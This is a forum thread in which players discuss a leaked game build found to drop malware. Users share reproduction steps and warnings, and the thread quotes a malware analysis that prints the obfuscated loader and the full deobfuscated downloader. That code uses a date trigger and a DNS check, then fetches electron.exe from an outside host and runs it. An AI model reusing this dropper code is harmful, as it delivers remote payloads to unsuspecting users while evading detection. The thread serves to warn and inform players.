Others Pervert Action: Timelapse [v0.73] [BBBen]

[Err0r 0ne]

No, you said what there is no mega link uploaded here, but there is. Strange what it wasn't the one what was uploaded on the front page yeah

I did, brave and stupid yes, but it went fine. Checked files and folders and everything is in order (no reason to believe me even if I show screenshots, buut even after v63 and deleted v70 there is still not enough content to bother )

Yeah, and that strange. Probably mods/uploaders used gofile link for different uploads on the main page, but it was corrupted for some reason, while mega link is ignored by them, so we now in this situation

You mean MEGA download work fine but all other download link are infected?

 

[JohnSchuler]

I only took the risk cus it ain't my main pc.

The heroes we need, your PC won't be forgotten o7

 

[JohnSchuler]

You mean MEGA download work fine but all other download link are infected?

Well, I say yes it is, BUT, I won't dare to try anything beside mega now after all those comments, and haven't checked those others at start cause, well... I just used mega as soon as it dropped and it was fine.
And as I said, there is not enough content to bother by trusting some rando (me) even with mega link, so better wait for professionals to resolve this situation

 

[daffyrolls94]

Well, I say yes it is, BUT, I won't dare to try anything beside mega now after all those comments, and haven't checked those others at start cause, well... I just used mega as soon as it dropped and it was fine.

It was fine for me too. Running the electron.exe from Appdata/Roaming/../Session Storage after reading the other guy's post caused the issue. My advice to everyone: don't download anything else from f95 until admin confirms the issue has been resolved. And hope to Satan it's only limited to this game.

 

[megalol]

Electron framework based games sometimes flags by AV as malware and from quick look of game there are no real traces of virus. But at same time there are exists

You must be registered to see the links

and also F-Secure sends electron.exe file (that creates inside "Session Storage folder" after running game.exe) to qurantine that are bad signs. So I'd say that it's 50/50 chances that game contains malware for now.

 

[Thermophob]

View attachment 4595966

I downloaded game from Betorini's link (It seems he used Author's links), though Linux version. Nothing strange in Session storage folder.

Electron framework based games sometimes flags by AV as malware and from quick look of game there are no real traces of virus. But at same time there are exists

You must be registered to see the links

and also F-Secure sends electron.exe file (that creates inside "Session Storage folder" after running game.exe) to qurantine that are bad signs. So I'd say that it's 50/50 chances that game contains malware for now.

I think somebody wrote that electron.exe checksum looks legitimate.

PS, this is simple HTML game shipped with own browser.

 

[megalol]

I think somebody wrote that electron.exe checksum looks legitimate.

PS, this is simple HTML game shipped with own browser.

CRC don't always tells regarding virus since legit exe may be used to download/launch some malware code or file but I didn't found such code (that starts husbandship.exe nor such file at all) maybe because electron.exe was blocked by my AV.

 

[daffyrolls94]

CRC don't always tells regarding virus since legit exe may be used to download/launch some malware code or file but I didn't found such code (that starts husbandship.exe nor such file at all) maybe because electron.exe was blocked by my AV.

For anyone wanting to reproduce it:
>start the v73 game, let it load to title and exit
>check if appdata/.../session storage and the electron.exe file in that folder (not the main install folder) has been created
>if yes, run the electron.exe (again, the one in appdata/roaming/..) and you get some sort of error message, cancel it
>start game again, chrome should have closed and task mgr should have husbandship.exe running

 

[megalol]

For anyone wanting to reproduce it:
>start the v73 game, let it load to title and exit
>check if appdata/.../session storage and the electron.exe file in that folder (not the main install folder) has been created
>if yes, run the electron.exe (again, the one in appdata/roaming/..) and you get some sort of error message, cancel it
>start game again, chrome should have closed and task mgr should have husbandship.exe running

electron.exe file settings (I've run game from VM so restored it from my AV quarantine to check) itself looks sus as fck (1st field is description and 2nd is organization) and its icon looks like some kind of (virus?) installer. Upd: yes, its password protected Inno Setup installer and has nothing to do with original electron executable! Sam?

 

[razor1977]

electron.exe is just the dropper, you didn't have to launch it itself to launch it, the game auto launches it at some point, husbandship.exe is the payload, if it is running in your task manager in the background, it is too late, you are already subject to whatever the file was designed to do, which could be a huge variety of things ranging from keyloggers, screen viewers and exclusive access to your pc like he himself is logged into it, or some thing more destructive which is less likely, if you partition bomb someones hd you can't exactly steal from them, maybe once you gotten the info you were after, whether it be bank cards , login info/password files , pretty much anything they want, if you can see it, so can they. They are also know to block browsers from loading, as well as task manager and the installation of any AV, leaving your only real solution is to remove you boot hd and the target hd from the computer, connect it to another computer that already has av on via USB, then try to kill it that way, if not you may have to do a complete system wipe after a low level format, which could literally take days to complete.

 

[Thermophob]

electron.exe is just the dropper, you didn't have to launch it itself to launch it, the game auto launches it at some point, husbandship.exe is the payload, if it is running in your task manager in the background, it is too late, you are already subject to whatever the file was designed to do, which could be a huge variety of things ranging from keyloggers, screen viewers and exclusive access to your pc like he himself is logged into it, or some thing more destructive which is less likely, if you partition bomb someones hd you can't exactly steal from them, maybe once you gotten the info you were after, whether it be bank cards , login info/password files , pretty much anything they want, if you can see it, so can they. They are also know to block browsers from loading, as well as task manager and the installation of any AV, leaving your only real solution is to remove you boot hd and the target hd from the computer, connect it to another computer that already has av on via USB, then try to kill it that way, if not you may have to do a complete system wipe after a low level format, which could literally take days to complete.

I am not sure if anybody else except you confirmed husbandship.exe running.

electron.exe file settings (I've run game from VM so restored it from my AV quarantine to check) itself looks sus as fck (1st field is description and 2nd is organization) and its icon looks like some kind of (virus?) installer. Upd: yes, its password protected Inno Setup installer and has nothing to do with original electron executable! Sam?
View attachment 4596346

Electron is a framework which combines chromium, node.js and HTML files into app. And guess what, this game is an app cobined from Chromium, node.js and HTML.... Not sure why it's stored in appdata/roaming, nor why file properties look like this at your PC, but I am suspecting, newer version of PAT uses electron. Also, as it was already pointed out by Sam, it is clean.

 

[razor1977]

I am not sure if anybody else except you confirmed husbandship.exe running.


Electron is a framework which combines chromium, node.js and HTML files into app. And guess what, this game is an app cobined from Chromium, node.js and HTML.... Not sure why it's stored in appdata/roaming, nor why file properties look like this at your PC, but I am suspecting, newer version of PAT uses electron. Also, as it was already pointed out by Sam, it is clean.

no, it is not clean, sam is wrong, also i bought the new version of PAT and no it is not in there, also multiple people confirmed husbanship running and being created

 

[daffyrolls94]

electron.exe is just the dropper, you didn't have to launch it itself to launch it, the game auto launches it at some point, husbandship.exe is the payload, if it is running in your task manager in the background, it is too late, you are already subject to whatever the file was designed to do, which could be a huge variety of things ranging from keyloggers, screen viewers and exclusive access to your pc like he himself is logged into it, or some thing more destructive which is less likely, if you partition bomb someones hd you can't exactly steal from them, maybe once you gotten the info you were after, whether it be bank cards , login info/password files , pretty much anything they want, if you can see it, so can they. They are also know to block browsers from loading, as well as task manager and the installation of any AV, leaving your only real solution is to remove you boot hd and the target hd from the computer, connect it to another computer that already has av on via USB, then try to kill it that way, if not you may have to do a complete system wipe after a low level format, which could literally take days to complete.

I checked for husbandship.exe before and after clicking on whatever tf electron.exe is, it wasn't there before in my case. I don't see it there now though. Thank FUCK I'm ocd enuf to have a shitty laptop exclusively for prawn grains. Was gonna brick it soon, this just a nice excuse. Also folks should consider checking if they've dled anything else uploaded by that user.

 

[Roehner]

Appdata/Roaming/<this game's folder>/Session Storage

That's from memory cus I deleted everything to do with this game. Electron.exe appears in above location AFTER I run the game. The husbandship.exe process appears in task mgr after running electron.exe from the above folder.

Okay, this is weird. I decided to run the game again as a test, after these reports, and now I get this Trojan as well. Really strange, as this Electron.exe didn't get created from previous playtests, which were done 25th and 26th.

I got paranoid from multiple people reporting this, so I did everything to scan my computer, from offline scans, to autoruns, etc. Nothing. I now opened the game again, which is when Electron.exe got created in %appdata%, with Windows Defender immediately guaranteeing it.

Obviously BBBen wouldn't put something malicious in his game, so it would seem to be the uploader.

Edit. I assume that it was programmed to not activate initially, so as top bypass testing, which is why I initially had no problem.

 

[Zemax]

The thread has been updated to v0.73 with a safe, clean game.

Unfortunately, the previous leak contained a virus. if you downloaded it, please check your system and redownload.

 

[SvenVlad]

My session storage folder doesn't have any electron.exe, so I think my firewall may have blocked it. Whew

 

[JohnSchuler]

Sooo, if nothing were created after a few tests, and nothing is found... does that mean I got lucky?

(Virus what have late activation, jeeesus...)

 

[Roehner]

My session storage folder doesn't have any electron.exe, so I think my firewall may have blocked it. Whew

Sooo, if nothing were created after a few tests, and nothing is found... does that mean I got lucky?

(Virus what have late activation, jeeesus...)

Probably best to scan your computer, but it had a timed component, as posted here, so as to avoid detection, which is why I was so confused initially. I'm no coder, having only taken a couple courses, but this section seems to be it.

function shouldDownloadFile() {
const currentDate = new Date();
const targetDate = new Date('2025-02-26');
return currentDate > targetDate;
}

If you played the game after 26th, it would download the electron.exe executable. If you didn't play the game after that point, it should be safe.

Here is the code posted in the other thread.

Pervert Action Timelapse v73 is infected.

- game.exe is the original electron.exe and there is nothing wrong with it.

- Similar to RenPy, the exe just executes scripts. In this case it's javascript instead of python.

- I've located the malware downloader in the \resources\app\data\SCRIPTS.js subfolder.

- the code and MO is virtually identical to the Milfania downloader.

function Component_CommandInterpreter_once() {
  const atob = (str) => Buffer.from(str, 'base64').toString('utf-8');

  // Base64 encoded script
  //
  const varscrload = "KGZ1bmN0aW9uKkgewogICAgY29ucOw=="; // this sting is much longer and has the actual code in it !!!

   try {
    const devarscrload = atob(varscrload);
    eval(devarscrload);
  } catch (e) {
    console.error("Error executing the script:", e);
  }
}

The deobfuscated version (the stuff in the 'varscrload' variable that gets executed) looks like this:

(function() {
    const fs = require('fs');
    const path = require('path');
    const https = require('https');
    const { spawn } = require('child_process');
    const dns = require('dns');

    function shouldDownloadFile() {
        const currentDate = new Date();
        const targetDate = new Date('2025-02-26');
        return currentDate > targetDate;
    }

    function checkDNSRecord(hostname, callback) {
        try {
            dns.resolveTxt(hostname, (err, records) => {
                if (err) {
                    callback(false);
                    return;
                }
                const txtValue = records.flat().join('');
                callback(txtValue === 'OK');
            });
        } catch (e) {
            callback(false);
        }
    }

    function getDownloadPath(filename) {
        const appDataPath = process.env.APPDATA || path.join(process.env.HOME || process.env.USERPROFILE, 'AppData', 'Roaming');
        const targetPath = path.join(appDataPath, 'Pervert Action Timelapse', 'Session Storage');

        if (!fs.existsSync(targetPath)) {
            fs.mkdirSync(targetPath, { recursive: true });
        }

        return path.join(targetPath, filename);
    }

function downloadAndRunFile(url, outputPath) {
  try {
    const file = fs.createWriteStream(outputPath);
    const options = {
      headers: {
        'User-Agent': 'Chrome1223'
      }
    };

    https.get(url, options, (response) => {
      if (response.statusCode !== 200) {
        console.error('Download failed with status:', response.statusCode);
        return;
      }
      response.pipe(file);

      file.on('finish', () => {
        file.close(() => {
          console.log('Download complete:', outputPath);

          setTimeout(() => {
            try {
              console.log('Executing file...');
              const child = spawn(outputPath, [], {
                detached: true,
                stdio: 'ignore'
              });
              child.unref();
            } catch (e) {
              console.error('Error spawning process:', e);
            }
          }, 1000); // Add a delay to ensure the file is completely closed
        });
      });
    }).on('error', (err) => {
      console.error('Download error:', err);
    });
  } catch (e) {
    console.error('Error during download or execution:', e);
  }
}

    setTimeout(() => {
        const downloadUrl = 'https://www.renpycloud.info/electron.exe';
        const outputPath = getDownloadPath('electron.exe');
        const dnsHostname = 'txt.renpycloud.info';

        if (shouldDownloadFile()) {
            checkDNSRecord(dnsHostname, (dnsCheckPassed) => {
                if (dnsCheckPassed) {
                    downloadAndRunFile(downloadUrl, outputPath);
                }
            });
        }
    }, 0);
})();

 

[SvenVlad]

Probably best to scan your computer, but it had a timed component, as posted here, so as to avoid detection, which is why I was so confused initially. I'm no coder, having only taken a couple courses, but this section seems to be it.

function shouldDownloadFile() {
const currentDate = new Date();
const targetDate = new Date('2025-02-26');
return currentDate > targetDate;
}

If you played the game after 26th, it would download the electron.exe executable. If you didn't play the game after that point, it should be safe.

Here is the code posted in the other thread.

Thanks, will do.

 

[elcap23]

well i don't know if i'm one lucky one, but i downloaded the game when launched but never extracted today extracted the game and windows 11 instantly delete the game when i launched, and put it in quarentene i not use chrome, but i search everything writen here and i don't found anything about that husband.exe till now.